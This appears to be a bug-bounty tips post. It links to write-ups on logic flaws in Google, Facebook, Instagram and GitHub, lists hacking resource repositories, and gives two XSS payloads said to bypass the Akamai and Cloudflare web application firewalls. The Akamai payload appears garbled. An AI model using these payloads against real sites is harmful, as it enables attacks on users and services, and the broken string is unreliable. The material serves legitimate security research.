Hunting Tips.pdf
155.2 KB
Collection of #bugbountytips (from Twitter, Facebook, PortSwigger, Medium, etc.)
https://github.com/Ma4xSec/Hunting-Tips/blob/master/Hunting%20Tips.md
Logic flaw
https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835
https://medium.com/@ritishkumarsingh/facebook-vulnerability-hidden-community-manager-in-pages-due-to-invitation-accept-logic-61ddbe229c97
https://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924
https://noobe.io/articles/2020-01/how-i-found-bug-google-search-console
https://medium.com/@raushanraj_65039/adding-a-malicious-notebook-to-be-treated-like-a-trusted-notebook-in-google-colab-1337-b84353a9f77
https://medium.com/@jbgrunewald/how-i-made-7500-from-my-first-bug-bounty-found-on-google-cloud-platform-1a5415d7569b
https://medium.com/nassec-cybersecurity-writeups/this-is-how-i-got-xxxx-from-facebook-for-instagram-bug-aaff50342246
https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
https://medium.com/bugbountywriteup/bypassing-the-fix-of-my-previous-instagram-bug-49ece4ea7e1d
https://medium.com/@naufalseptiadi/live-video-facebook-application-android-its-not-expired-when-log-out-the-device-on-4d4e0b67b362
#bugbounty #bugbountytips
Bug Bounty Tips:
Akamai XSS Bypass: “><svg/on</script>laod=alert>
Cloudflare XSS Bypass: <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Useful GitHub Repos:
1. Book of Secret Knowledge = https://lnkd.in/fWKCdi4
2. Awesome Hacking = https://lnkd.in/f7VPTEX
3. Awesome Bug Bounty = https://lnkd.in/fPrQiVD
4. Awesome Penetration Testing = https://lnkd.in/fAUZgu5
5. Awesome Web Hacking = https://lnkd.in/f5n2hSd